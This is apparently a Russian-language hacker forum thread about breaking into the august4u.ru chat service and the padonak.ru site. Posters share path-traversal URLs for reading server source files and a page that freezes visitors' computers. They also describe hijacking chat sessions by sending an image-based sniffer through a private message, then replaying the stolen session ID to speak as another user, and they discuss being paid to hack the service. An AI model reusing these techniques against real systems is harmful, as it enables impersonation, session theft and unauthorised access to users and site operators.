forever777, я всмысле - када чела килл или админ когда кидают из чата с зависанием компа то открываеца страничка к примеру: http://august4u.ru/killwin.html и твой комп висит от этой шняги... ******** censored!, попробую.. думаю прога AdMunch тож подойдёт.. ******** http://demo.august4u.ru http://demo.august4u.ru/admin/?? Login: demo Pass: demo Демо админки августа (тама всё только для чтения стоит ...)
Была дыра по сеиссии из админки demo, в админку заходишь, подставляешь свои значения. Но эту дыру вроде перекрыли чтоли. Сам не пробовал правда.
помните недавний конкурс от xakep.ru на падонке... тама была новосная лента - ждём баблос и т.д. в верху писалось число, месяц, год, эра. к примеру 25.04.05.n в строке браузера выглядело ....php?day=25&month=04&year=05&era=n подставив следующее: http://padonak.ru/cgi-bin/about/news/news.php?day=&month=&year=/index&era=php http://padonak.ru/cgi-bin/about/news/news.php?day=&month=&year=/param&era=pl http://padonak.ru/cgi-bin/about/news/news.php?day=&month=/&year=/news&era=php можно было почитать index.php, param.pl, news.php. в анкетах августа привыдаче ошибочного сообщения - "ник незарегестрирован" вначале пишется ">>" пример: http://august4u.ru/people/?id=&result=info&nick= может тут можно чтолибо подковырнуть????
в августе есть возможность разговора от чужого имени (возможно юзание админки и т.д.) через сесию..... узнаю чужую сессию и чужой id: (sess=1744f6b611019d6eb93aeccb05aaf934 id=12715728695d764c id2=3252) потом через LocationReplace вставляю значения к примеру в http://www.august4u.ru/mess.php?sess=1744f6b611019d6eb93aeccb05aaf934&id=12715728695d764c&id2=3252. вот и всё... работает пока на другом конце не выйдут из чата...
сесию узнал - послав личное сообщение с картинкой снифера. (если тока есть доступ: доступ к общим HTML тэгам доступ к стилям в HTML тэгах индивидуальные HTML тэги и в админке разрешён тег img) а вот id пришлось спросить. думаю проще будет самому зайти в чат под 2-мя никами и поэксперементировать...
Ошибаешся... Я сегодня всю ночь думал как и коечто надумал... И уже протестил! всё работает!... Возможно сегодня запишу видео... (зависит от напряги с работой)
мне кажется нестоит тока видео записывать пока ну можно канечно ну ты можешь реально заработать денег за это все щас много кто за то чтоб сервис взломали заплатят нармальные деньги!! мне лично придлогали за 1000 ну я еще пока не ломал!!
строка привата: http://www.august4u.ru/private?sess=bda9911aea74c4750b6eecae77987677&id=67c9hrb16a206102&id2=258 отсылаем фразу c картинкой (нужен доступ к HTML): http://antichat.ru/cgi-bin/s.jpg получаем id собеседника, а затем используем IE_XSS_Kit, вот и всё.
ладно пусть канечно запишет видео!! непомишает да и вобще надо понять рейтинг августина))) а то он там оборзел был такой случай так он сцука оборзел не в чем не уступает взвысел себя в короли!!!! давайте покажите ему как надо)))) если запишешь видео то отправь его мне лии kez чтоб он его опублековал!!!! а горили что августина не уязвим!!!! все уезвимо прото мозги надо!!! и опыт!!!
Думаю тут точно админ августа шастает... даже незнаю как его нехорошо и назвать... теперь строка привата выглядит вот так http://www.august4u.ru/private?id2=2312&private=1 а видео есть и то очень сырое... и то я в нём id узнал спросив.... даже нет смысла его размещать а строку привата несложно узнать в эксплорере есть волшебная кнопочка, F11 называеца, думаю ты на клавиатуре её найдёш...